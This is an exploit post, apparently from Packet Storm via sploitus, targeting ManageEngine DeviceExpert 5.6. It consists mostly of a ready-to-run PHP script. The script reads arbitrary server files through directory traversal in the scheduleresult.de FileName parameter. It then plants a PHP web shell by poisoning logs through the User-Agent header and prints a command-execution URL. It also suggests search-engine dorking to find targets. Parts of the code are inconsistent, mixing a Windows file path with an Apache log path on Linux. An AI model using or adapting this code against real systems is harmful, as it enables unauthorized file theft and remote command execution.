Share
## https://sploitus.com/exploit?id=PACKETSTORM:214351
=============================================================================================================================================
    | # Title     : ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName PHP Code Injection Vulnerability                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://download.manageengine.com/                                                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Web Shell injection if the target has an LFI (Local File Inclusion) vulnerability with code execution capability, or RFI (Remote File Inclusion), 
    
        or if we can write to a path that the web server can execute,
    	
        such as the uploads or webroot folder on the server.
    	
    	( https://packetstorm.news/files/id/181161/ )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 81
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class ManageEngineScanner {
        private $host;
        private $port;
        private $ssl;
        private $filepath;
    
        public function __construct($host, $port = 6060, $ssl = true, $filepath = 'windows\\win.ini') {
            $this->host = $host;
            $this->port = $port;
            $this->ssl = $ssl;
            $this->filepath = $filepath;
        }
    
        private function sendRequest($uri, $headers = []) {
            $protocol = $this->ssl ? 'https' : 'http';
            $url = "$protocol://{$this->host}:{$this->port}$uri";
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 25);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
    
            return [$http_code, $response];
        }
    
        public function run() {
            $traverse = str_repeat("..\\", 10);
            $filename = $this->filepath;
    
            list($code, $response) = $this->sendRequest("/scheduleresult.de");
            if ($code !== 200) {
                echo "[ERROR] Target is not ManageEngine DeviceExpert\n";
                return;
            }
    
            list($code, $response) = $this->sendRequest("/scheduleresult.de/?FileName={$traverse}{$filename}");
            
            if ($code === 200) {
                echo "[SUCCESS] {$this->host}:{$this->port} returns: $code\n";
                if (!empty($response)) {
                    $this->saveFile($response);
                } else {
                    echo "[ERROR] {$this->host}:{$this->port} - no file downloaded (empty)\n";
                }
            } elseif ($code === 404) {
                echo "[ERROR] {$this->host}:{$this->port} - file not found\n";
            } else {
                echo "[ERROR] Unable to communicate with {$this->host}:{$this->port}\n";
            }
        }
    
        private function saveFile($content) {
            $filename = basename($this->filepath);
            $path = __DIR__ . "/$filename";
            file_put_contents($path, $content);
            echo "[SUCCESS] File saved in: $path\n";
        }
    
        public function injectWebShell() {
            $webshell = "<?php system(\$_GET['cmd']); ?>";
            $headers = ["User-Agent: " . $webshell];
            
            list($code, $response) = $this->sendRequest("/scheduleresult.de", $headers);
            
            if ($code === 200) {
                echo "[SUCCESS] Web Shell injected via User-Agent!\n";
                echo "Access it at: http://{$this->host}/scheduleresult.de/?FileName=../../../../../../var/log/apache2/access.log&cmd=id\n";
            } else {
                echo "[ERROR] Web Shell injection failed!\n";
            }
        }
    }
    
    $scanner = new ManageEngineScanner('target_ip_here');
    $scanner->run();
    $scanner->injectWebShell();
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================